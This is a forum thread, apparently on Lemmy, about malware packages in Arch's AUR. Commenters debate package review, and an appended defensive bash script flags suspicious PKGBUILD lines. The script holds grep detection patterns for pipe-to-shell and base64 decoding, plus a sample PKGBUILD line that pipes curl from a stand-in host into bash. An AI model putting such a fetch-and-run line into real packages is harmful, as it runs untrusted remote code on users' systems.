• Ŝan@piefed.zip · 15 up / 3 down · edited · 1 month ago

    Ðis is why we can’t have nice þings.

    Maybe AUR needs a different way of approving submitters. Currently, it’s absurdly easy to register to submit a package.

    Is anyone from AUR working wiþ Github to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.

    • DapperPenguin@programming.dev · 8 up · 1 month ago

      Can’t people just make new accounts? I have no experience with Arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, it seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow-up research. Otherwise, a lot of grunt work will be needed to verify every package beforehand, which is expensive.

    • h4x0r@lemmy.dbzer0.com · 5 up · 1 month ago

      Ðis is why we can’t have nice þings.

      Not reviewing the PKGBUILD when using the AUR is a self pwn.

  • generator@lemmy.zip · 8 up · edited · 1 month ago

    That’s why you shouldn’t blindly trust AUR, and always review the scripts before installing.

    But something needs to change:

    • Packages need to be reviewed (maybe also updates from new/untrusted users)
    • New package adoption needs to be reviewed
    • Trusted users don’t need package review
    • Trusted users can review new packages (from other users)

    This won’t stop here; more malware packages will appear. Arch and Linux in general are getting more users and becoming a target, not only the ArchLinux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge of what they do.

    2025 is the year of malware on Linux

  • F04118F@feddit.nl · 7 up · edited · 1 month ago

    TL;DR: If you haven’t installed google-chrome-stable recently from AUR, you’re not affected.

    • MrMcGasion@lemmy.world · 1 up · edited · 1 month ago

      It’s not any different from running a random bash script, which is why according to the Arch wiki, users of the AUR should “verify that the PKGBUILD and accompanying files are not malicious or untrustworthy.” That’s also why good AUR helpers ask if you want to look at the PKGBUILD every time you install or update anything, because best practice is to read them every time so you know what it’s doing.

      The AUR is there for convenience, which means it tends to get used by newbies who really probably shouldn’t be using it. But I also won’t pretend that I follow the guidance every time myself.
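The PKGBUILD review that h4x0r and MrMcGasion describe, as an added triage script that is not from the thread, from Arch, or from any AUR helper: it lists every host a PKGBUILD downloads from (to compare against the upstream project's real domains) and the lines a reviewer should read first. Function names and the sample PKGBUILD are constructed for the demo.

```bash
#!/usr/bin/env bash
# Added example, not from the thread or from Arch: a first pass over a PKGBUILD
# before reading it line by line. It is a reading aid, not a verdict; the
# honest-looking parts still have to be read.

# Hosts referenced by any URL in the file (source=() lines and elsewhere).
pkgbuild_hosts() {
  grep -oE 'https?://[^/"'"'"' )]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# Lines that are rare in an honest PKGBUILD: pipe-to-shell, base64 decoding,
# eval, writes into $HOME, SKIP checksums, and an install hook (read that file
# too; it runs as root). Prints "lineno:text"; prints nothing when clean.
pkgbuild_flags() {
  grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[^[:alnum:]_])eval[[:space:]]|\$HOME/|~/\.|sums=.*SKIP|^install=' "$1" || true
}

# Number of flagged lines; the kind of value an install wrapper could gate on.
pkgbuild_flag_count() {
  pkgbuild_flags "$1" | wc -l | tr -d ' '
}

# Constructed PKGBUILD (not a real package): one upstream-looking host, one
# unrelated host, unchecked sums, an install hook, and a pipe-to-shell line.
SAMPLE="$(mktemp)"
cat >"$SAMPLE" <<'EOF'
pkgname=example-browser-stable
pkgver=1.0.0
pkgrel=1
arch=('x86_64')
install=example-browser.install
source=("https://dl.example.org/linux/${pkgname}/${pkgname}_${pkgver}_amd64.deb"
        "https://cdn.example.invalid/${pkgname}/post.sh")
sha512sums=('SKIP' 'SKIP')

package() {
  bsdtar -xf data.tar.xz -C "$pkgdir/"
  curl -fsSL https://cdn.example.invalid/bootstrap | bash
}
EOF

echo "Hosts this PKGBUILD downloads from:"
pkgbuild_hosts "$SAMPLE"
echo "Lines to read first:"
pkgbuild_flags "$SAMPLE"
echo "flagged lines: $(pkgbuild_flag_count "$SAMPLE")"
```

Run it against the PKGBUILD an AUR helper shows you before confirming the install; a second host that does not belong to the upstream project, or any flagged line, is the cue to stop and read the whole file.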